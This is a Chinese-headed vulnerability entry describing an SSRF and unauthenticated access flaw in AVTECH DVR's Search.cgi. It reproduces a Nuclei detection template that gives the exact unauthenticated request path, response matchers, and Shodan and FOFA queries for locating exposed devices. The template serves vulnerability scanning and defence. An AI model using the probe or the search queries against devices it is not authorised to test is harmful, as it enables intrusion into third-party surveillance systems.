漏洞描述
AVTECH DVR device, Search.cgi can be accessed directly. Search.cgi is responsible for searching and accessing cameras in the local network. Search.cgi provides the cgi_query function.
avtech-dvr-ssrf: AVTECH DVR - SSRF
PoC代码[已公开]
id: avtech-dvr-ssrf
info:
name: AVTECH DVR - SSRF
author: ritikchaddha
severity: medium
description: |
AVTECH DVR device, Search.cgi can be accessed directly. Search.cgi is responsible for searching and accessing cameras in the local network. Search.cgi provides the cgi_query function.
metadata:
verified: true
max-request: 1
shodan-query: title:"login" product:"Avtech"
fofa-query: app="AVTECH-视频监控"
tags: ssrf,avtech,unauth,iot,vuln
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/nobody/Search.cgi?action=scan"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Search.Device'
- 'Proto='
- 'IPAddress='
condition: and
- type: word
part: header
words:
- text/plain
- type: status
status:
- 200
# digest: 4b0a004830460221008129e0eedf752d8e691ba7330a495676199d932104c48775dec98a15a3dd9677022100b781a3be4d8821304913559b3783339ed61d2cf9d5c5afe859ece74fd38be1b8:922c64590222798bb761d5b6d8e72950